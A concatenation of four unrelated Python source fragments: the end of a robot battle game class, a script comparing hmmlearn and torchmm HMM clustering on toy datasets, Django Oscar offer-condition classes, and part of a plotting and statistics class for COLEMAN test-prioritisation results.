# indeed, let's hope this game does
global settings
robots = [[] for i in range(2)]
for robot in self._robots:
robot_info = []
for prop in settings.exposed_properties:
if prop != 'player_id':
robot_info.append(getattr(robot, prop))
robots[robot.player_id].append(robot_info)
return robots
def run_turn(self):
global settings
self.notify_new_turn()
self.make_robots_act()
self.remove_dead()
if self.turns % settings.spawn_every == 0:
self.clear_spawn_points()
self.spawn_robot_batch()
if self._record:
round_history = self.make_history()
for i in (0, 1):
self.history[i].append(round_history[i])
self.turns += 1
def get_scores(self):
scores = [0, 0]
for robot in self._robots:
scores[robot.player_id] += 1
return scores
|
from itertools import cycle, islice
from functools import partial
from sklearn.preprocessing import StandardScaler
from sklearn import datasets
import torch
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import numpy as np
from hmmlearn.hmm import GaussianHMM
from torchmm.hmm import HiddenMarkovModel
from torchmm.base import DiagNormalModel
from torchmm.utils import kmeans_init
from torchmm.utils import kmeans
GaussianHMM = partial(GaussianHMM,
transmat_prior=2,
startprob_prior=2,
covars_prior=1,
covars_weight=1,
means_prior=0,
means_weight=0,
n_iter=100,
# min_covar=5,
tol=1e-3,
)
# np.random.seed(0)
# ============
# Generate datasets. We choose the size big enough to see the scalability
# of the algorithms, but not too big to avoid too long running times
# ============
n_samples = 1500
noisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,
noise=.05)
noisy_moons = datasets.make_moons(n_samples=n_samples, noise=.05)
blobs = datasets.make_blobs(n_samples=n_samples, random_state=8)
no_structure = np.random.rand(n_samples, 2), None
# Anisotropicly distributed data
random_state = 170
X, y = datasets.make_blobs(n_samples=n_samples, random_state=random_state)
transformation = [[0.6, -0.6], [-0.4, 0.8]]
X_aniso = np.dot(X, transformation)
aniso = (X_aniso, y)
# blobs with varied variances
varied = datasets.make_blobs(n_samples=n_samples,
cluster_std=[1.0, 2.5, 0.5],
random_state=random_state)
# ============
# Set up cluster parameters
# ============
plt.figure(figsize=(9 * 2 + 3, 12.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
hspace=.01)
plot_num = 1
default_base = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3,
'min_samples': 20,
'xi': 0.05,
'min_cluster_size': 0.1}
datasets = [
(noisy_circles, {'damping': .77, 'preference': -240,
'quantile': .2, 'n_clusters': 2,
'min_samples': 20, 'xi': 0.25}),
(noisy_moons, {'damping': .75, 'preference': -220, 'n_clusters': 2}),
(varied, {'eps': .18, 'n_neighbors': 2,
'min_samples': 5, 'xi': 0.035, 'min_cluster_size': .2}),
(aniso, {'eps': .15, 'n_neighbors': 2,
'min_samples': 20, 'xi': 0.1, 'min_cluster_size': .2}),
(blobs, {}),
(no_structure, {})]
for i_dataset, (dataset, algo_params) in enumerate(datasets):
# update parameters with dataset-specific values
params = default_base.copy()
params.update(algo_params)
# print(params)
X, y = dataset
# normalize dataset for easier parameter selection
X = StandardScaler().fit_transform(X)
n_states = params['n_clusters']
samples = X
lengths = np.array([1 for s in X])
# assert len(samples) >= n_states
hmm = GaussianHMM(n_components=n_states)
hmm.fit(samples, lengths)
y_pred = hmm.predict(samples, lengths)
means = hmm.means_
# print('covars shape')
# print(hmm.covars_.shape)
var = [np.diag(c) for c in hmm.covars_]
std = np.sqrt(np.stack(var))
# print(std)
plt.subplot(len(datasets), 2, plot_num)
if i_dataset == 0:
plt.title('hmmlearn', size=18)
colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']),
int(max(y_pred) + 1))))
# add black color for outliers (if any)
colors = np.append(colors, ["#000000"])
plt.scatter(X[:, 0], X[:, 1], s=10,
color=colors[y_pred])
plt.scatter(means[:, 0], means[:, 1], s=20, color='red')
ax = plt.gca()
for i in range(std.shape[0]):
ellipse = Ellipse(means[i], width=(
2 * std[i, 0]), height=(2 * std[i, 1]), alpha=0.3, edgecolor="red")
ax.add_patch(ellipse)
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.xticks(())
plt.yticks(())
plot_num += 1
# TORCHMM
X = torch.from_numpy(X).float().unsqueeze(1)
# print(X.shape)
# fit
T0 = torch.zeros(n_states).softmax(0)
T = torch.zeros((n_states, n_states)).softmax(1)
init_centroids = kmeans(X.squeeze(), n_states)
centroids = init_centroids.clone()
states = []
for s_idx in range(n_states):
precisions = torch.ones(2)
states.append(DiagNormalModel(centroids[s_idx], precisions))
hmm = HiddenMarkovModel(states, T0=T0, T=T)
converged = hmm.fit(X, epsilon=1e-8)
print()
print('CONVERGED', converged)
print()
score = hmm.log_prob(X) # + hmm.log_parameters_prob()
print('ll', score)
# print('ll (no prior)', hmm.log_prob(X))
print("Pi Matrix: ")
print(hmm.T0)
# print("Transition Matrix: ")
# print(hmm.T)
# assert np.allclose(transition.exp().data.numpy(), True_T, atol=0.1)
# print()
# print("Emission Matrix: ")
# for s in hmm.states:
# print("Means")
# print(list(s.parameters())[0])
# print("Variance")
# print(1/list(s.parameters())[1])
means = torch.stack([list(s.parameters())[0] for s in states])
means = means.detach().numpy()
precs = torch.stack([list(s.parameters())[1] for s in states])
# precs = precs.detach().numpy()
std = (1/precs.sqrt()).detach().numpy()
# print('std', std)
y_pred, _ = hmm.decode(X)
y_pred = y_pred.squeeze(1)
# END FIT
plt.subplot(len(datasets), 2, plot_num)
if i_dataset == 0:
plt.title('torchmm', size=18)
colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']),
int(max(y_pred) + 1))))
# add black color for outliers (if any)
colors = np.append(colors, ["#000000"])
plt.scatter(X.squeeze(1)[:, 0], X.squeeze(1)[:, 1], s=10,
color=colors[y_pred])
plt.scatter(init_centroids[:, 0], init_centroids[:, 1], s=20,
color="black")
plt.scatter(means[:, 0], means[:, 1], s=20, color='red')
ax = plt.gca()
for i in range(precs.shape[0]):
ellipse = Ellipse(means[i], width=(
2 * std[i, 0]), height=(2 * std[i, 1]), alpha=0.3, edgecolor="red")
ax.add_patch(ellipse)
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.xticks(())
plt.yticks(())
plot_num += 1
plt.show()
|
from decimal import Decimal as D, ROUND_UP
from django.core import exceptions
from django.db import models
from django.utils.translation import gettext_lazy as _
from oscar.apps.offer import utils
from oscar.apps.offer.conditions import (
CountCondition,
CoverageCondition,
ValueCondition,
)
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Condition = get_model("offer", "Condition")
def _default_clean(self):
if not self.range:
raise exceptions.ValidationError(_("Selected condition type requires a range."))
if not self.value:
raise exceptions.ValidationError(_("Selected condition type required a value."))
class BluelightCountCondition(CountCondition):
_description = _("Basket includes %(count)d item(s) from %(range)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Count condition")
verbose_name_plural = _("Count conditions")
@property
def name(self):
return self._description % {
"count": self.value,
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"count": self.value,
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def consume_items(self, offer, basket, affected_lines):
"""
Same as CountCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
num_consumed = 0
affected_lines = list(affected_lines)
for line, __, quantity in affected_lines:
if line.id in applicable_line_ids:
num_consumed += quantity
to_consume = max(0, self.value - num_consumed)
if to_consume == 0:
return affected_lines
for __, line in applicable_lines:
quantity_to_consume = min(line.quantity_without_discount, to_consume)
line.consume(quantity_to_consume)
affected_lines.append((line, 0, quantity_to_consume))
to_consume -= quantity_to_consume
if to_consume == 0:
break
return affected_lines
class BluelightCoverageCondition(CoverageCondition):
_description = _("Basket includes %(count)d distinct item(s) from %(range)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Coverage Condition")
verbose_name_plural = _("Coverage Conditions")
@property
def name(self):
return self._description % {
"count": self.value,
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"count": self.value,
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def consume_items(self, offer, basket, affected_lines):
"""
Same as CoverageCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
consumed_products = []
affected_lines = list(affected_lines)
for line, __, quantity in affected_lines:
if line.id in applicable_line_ids:
consumed_products.append(line.product)
to_consume = max(0, self.value - len(consumed_products))
if to_consume == 0:
return affected_lines
for line in basket.all_lines():
product = line.product
if not self.can_apply_condition(line):
continue
if product in consumed_products:
continue
if not line.is_available_for_offer_discount(offer):
continue
# Only consume a quantity of 1 from each line
line.consume(1)
affected_lines.append((line, 0, 1))
consumed_products.append(product)
to_consume -= 1
if to_consume == 0:
break
return affected_lines
class BluelightValueCondition(ValueCondition):
_description = _("Basket includes %(amount)s (%(tax)s) from %(range)s")
_tax_inclusive = False
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Value condition")
verbose_name_plural = _("Value conditions")
@property
def name(self):
return self._description % {
"amount": currency(self.value),
"tax": _("tax-inclusive") if self._tax_inclusive else _("tax-exclusive"),
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"amount": currency(self.value),
"tax": _("tax-inclusive") if self._tax_inclusive else _("tax-exclusive"),
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def is_satisfied(self, offer, basket):
"""
Determine whether a given basket meets this condition
"""
value_of_matches = D("0.00")
for line in basket.all_lines():
if self.can_apply_condition(line) and line.quantity_without_discount > 0:
price = self._get_unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
if value_of_matches >= self.value:
return True
return False
def _get_value_of_matches(self, offer, basket):
if hasattr(self, "_value_of_matches"):
return getattr(self, "_value_of_matches")
value_of_matches = D("0.00")
for line in basket.all_lines():
if self.can_apply_condition(line) and line.quantity_without_discount > 0:
price = self._get_unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
self._value_of_matches = value_of_matches
return value_of_matches
def _get_unit_price(self, offer, line):
price = utils.unit_price(offer, line)
if self._tax_inclusive and line.is_tax_known:
price += line.unit_tax
return price
def consume_items(self, offer, basket, affected_lines):
"""
Same as ValueCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
value_consumed = D("0.00")
affected_lines = list(affected_lines)
for line, __, qty in affected_lines:
if line.id in applicable_line_ids:
price = self._get_unit_price(offer, line)
value_consumed += price * qty
to_consume = max(0, self.value - value_consumed)
if to_consume == 0:
return affected_lines
for price, line in applicable_lines:
quantity_to_consume = (to_consume / price).quantize(D(1), ROUND_UP)
quantity_to_consume = min(
line.quantity_without_discount, quantity_to_consume
)
line.consume(quantity_to_consume)
affected_lines.append((line, 0, quantity_to_consume))
to_consume -= price * quantity_to_consume
if to_consume <= 0:
break
return affected_lines
class BluelightTaxInclusiveValueCondition(BluelightValueCondition):
_tax_inclusive = True
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Tax-Inclusive Value Condition")
verbose_name_plural = _("Tax-Inclusive Value Conditions")
class CompoundCondition(Condition):
"""
An offer condition that aggregates together multiple other conditions,
allowing the creation of compound rules for offers.
"""
AND, OR = ("AND", "OR")
CONJUNCTION_TYPE_CHOICES = (
(AND, _("Logical AND")),
(OR, _("Logical OR")),
)
conjunction = models.CharField(
_("Sub-Condition conjunction type"),
choices=CONJUNCTION_TYPE_CHOICES,
default=AND,
max_length=10,
help_text="Select the conjunction which will be used to logically join the sub-conditions together.",
)
subconditions = models.ManyToManyField(
"offer.Condition",
related_name="parent_conditions",
verbose_name=_("Sub-Conditions"),
help_text=_(
"Select the sub-conditions that this compound-condition will combine."
),
)
class Meta:
app_label = "offer"
verbose_name = _("Compound condition")
verbose_name_plural = _("Compound conditions")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.proxy_class = "%s.%s" % (
CompoundCondition.__module__,
CompoundCondition.__name__,
)
@property
def children(self):
if self.pk is None:
return []
chil = [c for c in self.subconditions.order_by("id").all() if c.id != self.id]
return chil
@property
def name(self):
names = (c.name for c in self.children)
return self._human_readable_conjoin(names, _("Empty Condition"))
@property
def description(self):
descrs = (c.description for c in self.children)
return self._human_readable_conjoin(descrs, _("Empty Condition"))
def _clean(self):
if self.range:
raise exceptions.ValidationError(
_("Compound conditions should not have a range.")
)
if self.value:
raise exceptions.ValidationError(
_("Compound conditions should not have a value.")
)
def is_satisfied(self, *args):
return self._reduce_results(self.conjunction, "is_satisfied", *args)
def is_partially_satisfied(self, *args):
return self._reduce_results(self.OR, "is_partially_satisfied", *args)
def get_upsell_message(self, offer, basket):
messages = []
for c in self.children:
condition = c.proxy()
partial = condition.is_partially_satisfied(offer, basket)
complete = condition.is_satisfied(offer, basket)
if not complete and partial:
messages.append(condition.get_upsell_message(offer, basket))
return self._human_readable_conjoin(messages)
def consume_items(self, offer, basket, affected_lines):
memo = affected_lines
for c in self.children:
affected_lines = c.proxy().consume_items(offer, basket, memo)
if affected_lines and affected_lines.__iter__:
memo = affected_lines
return affected_lines
def _human_readable_conjoin(self, strings, empty=None):
labels = {
self.AND: _(" and "),
self.OR: _(" or "),
}
strings = list(strings)
if len(strings) <= 0 and empty is not None:
return empty
return labels[self.conjunction].join(strings)
def _reduce_results(self, conjunction, method_name, *args):
result = self._get_conjunction_root_memo(conjunction)
for c in self.children:
condition = c.proxy()
fn = getattr(condition, method_name)
subresult = fn(*args)
result = self._apply_conjunction(conjunction, result, subresult)
return result
def _get_conjunction_root_memo(self, conjunction):
memos = {
self.AND: True,
self.OR: False,
}
return memos[conjunction]
def _apply_conjunction(self, conjunction, a, b):
fns = {
self.AND: lambda: a and b,
self.OR: lambda: a or b,
}
return fns[conjunction]()
__all__ = [
"BluelightCountCondition",
"BluelightCoverageCondition",
"BluelightValueCondition",
"CompoundCondition",
]
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# rpy2
import rpy2.robjects as ro
import seaborn as sns
import textwrap
import traceback
from pathlib import Path
from roses.effect_size import vargha_delaney
# roses
from roses.statistical_test.kruskal_wallis import kruskal_wallis
from rpy2.robjects import pandas2ri
from rpy2.robjects.conversion import localconverter
MAX_XTICK_WIDTH = 10
# For a beautiful plots
plt.style.use('ggplot')
sns.set_style("whitegrid")
sns.set(palette="pastel")
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_colwidth', None)
def exception_to_string(excp):
stack = traceback.extract_stack(
)[:-3] + traceback.extract_tb(excp.__traceback__) # add limit=??
pretty = traceback.format_list(stack)
return ''.join(pretty) + '\n {} {}'.format(excp.__class__, excp)
class Analisys(object):
"""
This class provide function to manage the result provide by COLEMAN
"""
def __init__(self, project_dir, results_dir, variant_folder=None, font_size_plots=25,
sched_time_ratio=[0.1, 0.5, 0.8], replace_names=[], columns_metrics=[]):
self.project_dir = project_dir
self.project = project_dir.split('/')[-1]
self.results_dir = results_dir
self.columns_metrics = columns_metrics
self.is_variant_test = variant_folder is not None
if self.is_variant_test:
self.figure_dir = f"{self.results_dir}_plots/{variant_folder}/{self.project}"
else:
self.figure_dir = f"{self.results_dir}_plots/{self.project}"
Path(self.figure_dir).mkdir(parents=True, exist_ok=True)
self.sched_time_ratio = sched_time_ratio
self.sched_time_ratio_names = [
str(int(tr * 100)) for tr in sched_time_ratio]
self.reward_names = {
'Time-ranked Reward': 'TimeRank',
'timerank': 'TimeRank', # From RETECS definition
'Reward Based on Failures': 'RNFail'
}
# Load the information about the system
self.df_system = self._get_df_system()
# Load the results from system
self.datasets = {}
self._load_datasets(variant_folder, replace_names)
self.font_size_plots = font_size_plots
self._update_rc_params()
def update_project(self, project_dir, variant_folder=None, replace_names=[]):
self.project_dir = project_dir
self.project = project_dir.split('/')[-1]
if self.is_variant_test:
self.figure_dir = f"{self.results_dir}_plots/{variant_folder}/{self.project}"
else:
self.figure_dir = f"{self.results_dir}_plots/{self.project}"
Path(self.figure_dir).mkdir(parents=True, exist_ok=True)
# Load the information about the system
self.df_system = self._get_df_system()
# Load the results from system
self.datasets = {}
self._load_datasets(variant_folder, replace_names)
def update_font_size(self, font_size_plots):
self.font_size_plots = font_size_plots
self._update_rc_params()
def _update_rc_params(self):
plt.rcParams.update({
'font.size': self.font_size_plots,
'xtick.labelsize': self.font_size_plots,
'ytick.labelsize': self.font_size_plots,
'legend.fontsize': self.font_size_plots,
'axes.titlesize': self.font_size_plots,
'axes.labelsize': self.font_size_plots,
'figure.max_open_warning': 0,
'pdf.fonttype': 42
})
def _get_df_system(self):
# Dataset Info
df = pd.read_csv(f'{self.project_dir}/features-engineered.csv', sep=';', thousands=',')
df = df.groupby(['BuildId'], as_index=False).agg({'Duration': np.sum})
df.rename(columns={'BuildId': 'step',
'Duration': 'duration'}, inplace=True)
return df
def _load_datasets(self, variant_folder=None, replace_names=[]):
for tr in self.sched_time_ratio_names:
if variant_folder is not None:
df_path = f"{self.results_dir}/time_ratio_{tr}/{variant_folder}"
else:
df_path = f"{self.results_dir}/time_ratio_{tr}"
df = pd.read_csv(f'{df_path}/{self.project}.csv', sep=';', thousands=',', low_memory=False)
df = df[['experiment', 'step', 'policy', 'reward_function', 'prioritization_time', 'time_reduction', 'ttf',
'fitness', 'avg_precision', 'cost', 'rewards']]
df['reward_function'] = df['reward_function'].apply(
lambda x: x if x == '-' else x.replace(x, self.reward_names[x]))
df['policy'] = df['policy'].apply(
lambda x: replace_names[x] if x in replace_names.keys() else x)
df = df[df.policy.isin(self.columns_metrics)]
df = df[df.reward_function != 'RNFail']
# df['name'] = df.apply(lambda row: f"{row['policy']} ({row['reward_function']})"
# if 'Deterministic' not in row['policy'] else 'Deterministic', axis=1)
# df['name'] = df['name'].apply(
# lambda x: 'Random' if 'Random' in x else x)
df['name'] = df['policy']
n_builds = len(df['step'].unique())
# Find the deterministic
dt = df[df['name'] == 'Deterministic']
# As we have only one experiment run (deterministic), we increase to have 30 independent runs
# This allow us to calculate the values without problems :D
dt = dt.append([dt] * 29, ignore_index=True)
dt['experiment'] = np.repeat(list(range(1, 31)), n_builds)
# Clean
df = df[df['name'] != 'Deterministic']
df = df.append(dt)
df.sort_values(by=['name'], inplace=True)
df.drop_duplicates(inplace=True)
self.datasets[tr] = df
def _replace_names(self, df, names: dict, column='policy'):
return df[column].apply(lambda x: names[x] if x in names.keys() else x)
def replace_names(self, names: dict, column='policy'):
for key in self.datasets.keys():
self.datasets[key][column] = self._replace_names(
self.datasets[key], names, column)
def _get_metric_ylabel(self, column, rw=None):
metric = 'NAPFD'
ylabel = metric
if column == 'cost':
metric = 'APFDc'
ylabel = metric
elif column == 'ttf':
metric = 'RFTC'
ylabel = 'Rank of the Failing Test Cases'
elif column == 'prioritization_time':
metric = 'PrioritizationTime'
ylabel = 'Prioritization Time (sec.)'
elif column == "rewards":
metric = rw
ylabel = rw
return metric, ylabel
def _get_rewards(self):
if len(self.datasets.keys()) > 0:
return self.datasets[list(self.datasets.keys())[0]][
'reward_function'].unique()
else:
return []
def _get_policies(self):
if len(self.datasets.keys()) > 0:
return self.datasets[list(self.datasets.keys())[0]]['name'].unique()
else:
return []
def print_mean(self, df, column, direction='max'):
mean = df.groupby(['name'], as_index=False).agg(
{column: ['mean', 'std', 'max', 'min']})
mean.columns = ['name', 'mean', 'std', 'max', 'min']
# sort_df(mean)
# Round values (to be used in the article)
mean = mean.round({'mean': 4, 'std': 3, 'max': 4, 'min': 4})
mean = mean.infer_objects()
# minimum = mean[mean['mean'] > 0]
# minimum = minimum['mean'].idxmin()
minimum = mean['mean'].idxmin()
bestp = mean.loc[mean['mean'].idxmax() if direction ==
'max' else minimum]
val = 'Highest' if direction == 'max' else 'Lowest'
print(f"\n{val} Value found by {bestp['name']}: {bestp['mean']:.4f}")
print("\nMeans:")
print(mean)
return mean, bestp['name']
def print_mean_latex(self, x, column):
policies = self._get_policies()
print(*policies, sep="\t")
cont = len(policies)
for policy in policies:
df_temp = x[x.name == policy]
print(f"{df_temp[column].mean():.4f} $\pm$ {df_temp[column].std():.3f} ", end="")
cont -= 1
if cont != 0:
print("& ", end="")
print()
def _define_axies(self, ax, tr, column, ylabel=None):
metric, ylabel_temp = self._get_metric_ylabel(column)
ax.set_xlabel('CI Cycle', fontsize=self.font_size_plots)
ax.set_ylabel(ylabel + " " + metric if ylabel is not None else metric,
fontsize=self.font_size_plots)
ax.set_title(f"Time Budget: {tr}%", fontsize=self.font_size_plots)
def _plot_accumulative(self, df, ax, tr, column='fitness'):
df = df[['step', 'name', column]]
df.groupby(['step', 'name']).mean()[
column].unstack().cumsum().plot(ax=ax, linewidth=3)
self._define_axies(ax, tr, column, ylabel='Accumulative')
def plot_accumulative(self, figname, column='fitness'):
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(25, 8))
# Todo try a generic way
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
self._plot_accumulative(self.datasets[df_k], ax, tr, column)
handles, labels = ax1.get_legend_handles_labels()
# lgd = fig.legend(handles, labels, bbox_to_anchor=(
# 0, -0.03, 1, 0.2), loc='lower center', ncol=len(policies))
# lgd = ax1.legend(handles, labels, bbox_to_anchor=(-0.02,
# 1.05, 1, 0.2), loc='lower left', ncol=len(policies))
lgd = fig.legend(handles, labels, bbox_to_anchor=(
0.98, 0.1), loc='lower right')
ax1.get_legend().remove()
ax2.get_legend().remove()
ax3.get_legend().remove()
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{figname}.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
def _plot_lines(self, df, ax, tr, column='fitness'):
df = df[['step', 'name', column]]
df.groupby(['step', 'name']).mean()[
column].unstack().plot(ax=ax, linewidth=3)
self._define_axies(ax, tr, column)
def plot_lines(self, figname, column='fitness'):
policies = self._get_policies()
fig, axes = plt.subplots(
nrows=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(25, 20))
# Todo try a generic way
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
self._plot_lines(self.datasets[df_k], ax, tr, column)
handles, labels = ax1.get_legend_handles_labels()
lgd = ax1.legend(handles, labels, bbox_to_anchor=(-0.005, 1.05, 1, 0.2), loc='lower left',
ncol=len(policies))
ax2.get_legend().remove()
ax3.get_legend().remove()
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{figname}.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
def _visualize_ntr(self, df, tr, ax, total_time_spent):
policies = self.columns_metrics
# Only the commits which failed
x = df[['experiment', 'name', 'time_reduction']
][(df.avg_precision == 123)]
df_ntr = pd.DataFrame(columns=['experiment', 'name', 'n_reduction'])
# print(*policies, sep="\t")
# cont = len(policies)
row = [tr]
means = []
for policy in policies:
df_ntr_temp = x[x.name == policy]
# sum all differences (time_reduction column) in all cycles for
# each experiment
df_ntr_temp = df_ntr_temp.groupby(['experiment'], as_index=False).agg({
'time_reduction': np.sum})
# Evaluate for each experiment
df_ntr_temp['n_reduction'] = df_ntr_temp['time_reduction'].apply(
lambda x: x / (total_time_spent))
df_ntr_temp['name'] = policy
df_ntr_temp = df_ntr_temp[['experiment', 'name', 'n_reduction']]
df_ntr = df_ntr.append(df_ntr_temp)
means.append(df_ntr_temp['n_reduction'].mean())
if means[-1] <= 0:
means[-1] = 0.0
text = f"{means[-1]:.4f} $\pm$ {df_ntr_temp['n_reduction'].std():.3f}"
row.append(text)
if len(df_ntr) > 0:
df_ntr.sort_values(by=['name', 'experiment'], inplace=True)
sns.boxplot(x='name', y='n_reduction', data=df_ntr, ax=ax)
ax.set_xlabel('')
ax.set_ylabel('Normalized Time Reduction' if tr ==
'10' else '') # Workaround
ax.set_title(f"Time Budget: {tr}%")
ax.set_xticklabels(textwrap.fill(x.get_text(), MAX_XTICK_WIDTH)
for x in ax.get_xticklabels())
best_idx = [i for i, x in enumerate(means) if x == max(means)]
if len(best_idx) == 1:
best_i = best_idx[0]
row[best_i + 1] = f"\\cellbold{{{row[best_i + 1]}}}"
else:
for best_i in best_idx:
row[best_i + 1] = f"\\cellgray{{{row[best_i + 1]}}}"
return row
def visualize_ntr(self):
stat_columns = ['TimeBudget'] + self.columns_metrics
df_stats = pd.DataFrame(columns=stat_columns)
# Total time spent in each Cycle
total_time_spent = self.df_system['duration'].sum()
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(int(8.3 * 3 * (len(policies) / 3)), 8))
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
df = self.datasets[df_k]
row = self._visualize_ntr(df, tr, ax, total_time_spent)
df_stats = df_stats.append(
pd.DataFrame([row], columns=stat_columns))
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/NTR.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
df_stats['Metric'] = 'NTR'
return df_stats
def _visualize_duration(self, df):
dd = df[['name', 'prioritization_time']]
# sort_df(dd)
self.print_mean(dd, 'prioritization_time', direction='min')
self.print_mean_latex(dd, 'prioritization_time')
def visualize_duration(self):
rewards = self._get_rewards()
for rw in rewards:
print(f"\n\n======{rw}======")
for df_k, tr in zip(self.datasets.keys(), self.sched_time_ratio_names):
print(f"\nTime Budget {tr}%")
df = self.datasets[df_k]
self._visualize_duration(df[df.reward_function == rw])
def _transpose_df(self, df, column='name'):
df_tras = df.copy()
df_tras.index = df_tras[column]
return df_tras.transpose()
def _rmse_calculation(self, df, column='fitness'):
def get_rmse_symbol(mean):
"""
very near if RMSE < 0.15
near if 0.15 <= RMSE < 0.23
reasonable if 0.23 <= RMSE < 0.30
far if 0.30 <= RMSE < 0.35
very far if 0.35 <= RMSE
"""
if mean < 0.15:
# very near
return "$\\bigstar$"
elif mean < 0.23:
# near
return "$\\blacktriangledown$"
elif mean < 0.30:
# reasonable
return "$\\triangledown$"
elif mean < 0.35:
# far
return "$\\vartriangle$"
else:
# very far
return "$\\blacktriangle$"
def get_mean_std_rmse(df_rmse, column, n_builds):
df_f = df_rmse.groupby(['experiment'], as_index=False).agg(
{column: lambda x: np.sqrt(sum(x) / n_builds)})
# Get column values and provide a beautiful output
mean, std = round(df_f[column].mean(), 4), round(
df_f[column].std(), 4)
return [mean, std, f"{mean:.4f} $\\pm$ {std:.3f} {get_rmse_symbol(mean)}".strip()]
def get_config_latex(row, best_rmse, contains_equivalent):
"""
Latex commands used:
- Best algorithm: \newcommand{\cellgray}[1]{\cellcolor{gray!30}{#1}}
- Equivalent to the best one: \newcommand{\cellbold}[1]{\cellcolor{gray!30}{\textbf{#1}}}
"""
if contains_equivalent and row['mean'] == best_rmse:
return f"\\cellgray{{{row['output']}}}"
if row['mean'] == best_rmse:
return f"\\cellbold{{{row['output']}}}"
return row['output']
columns = [column, 'experiment', 'step']
n_builds = len(df['step'].unique())
# Get only the required columns
df = df[['experiment', 'step', 'name', column]]
# Orderby to guarantee the right value
df.sort_values(by=['experiment', 'step'], inplace=True)
df_rmse = pd.DataFrame(
columns=['experiment', 'step', 'Deterministic'])
dt = df.loc[df['name'] == 'Deterministic', columns]
df_rmse['Deterministic'] = dt[column]
df_rmse['experiment'] = dt['experiment']
df_rmse['step'] = dt['step']
policies = list(self._get_policies())
policies.remove('Deterministic')
for pol in policies:
df_rmse[pol] = df.loc[df['name']
== pol, columns][column].tolist()
df_rmse = df_rmse.reset_index()
for pol in policies:
df_rmse[f'RMSE_{pol}'] = df_rmse.apply(lambda x: (x[pol] - x['Deterministic']) ** 2, axis=1)
df_rmse_rows = []
for pol in policies:
rmse = get_mean_std_rmse(df_rmse, f'RMSE_{pol}', n_builds)
df_rmse_rows.append([pol] + rmse)
df_rmse_results = pd.DataFrame(
df_rmse_rows, columns=['name', 'mean', 'std', 'output'])
best_rmse = df_rmse_results['mean'].min()
contains_equivalent = len(
df_rmse_results[df_rmse_results['mean'] == best_rmse]) > 1
df_rmse_results['latex_format'] = df_rmse_results.apply(
lambda row: get_config_latex(row, best_rmse, contains_equivalent), axis=1)
# Select the main information
rmse = df_rmse_results[['name', 'latex_format']]
# Return only the values
return self._transpose_df(rmse).values[1]
def rmse_calculation(self, column='fitness'):
policies = list(self._get_policies())
policies.remove('Deterministic')
rmse_cols = ['TimeBudget'] + policies
df_rmse = pd.DataFrame(columns=rmse_cols)
for df_k, tr in zip(self.datasets.keys(), self.sched_time_ratio_names):
df = self.datasets[df_k]
row = [tr] + list(self._rmse_calculation(df, column))
df_rmse = df_rmse.append(pd.DataFrame([row], columns=rmse_cols))
metric, ylabel = self._get_metric_ylabel(column)
df_rmse['Metric'] = 'RMSE_' + metric
return df_rmse
def _statistical_test_kruskal(self, df, ax, column):
if column == 'ttf':
df = df[df.ttf > 0]
if (len(df)) > 0:
# Get the mean of fitness in each experiment
x = df[['experiment', 'name', column]]
policies = self._get_policies()
diff_pol = list(set(policies) - set(x['name'].unique()))
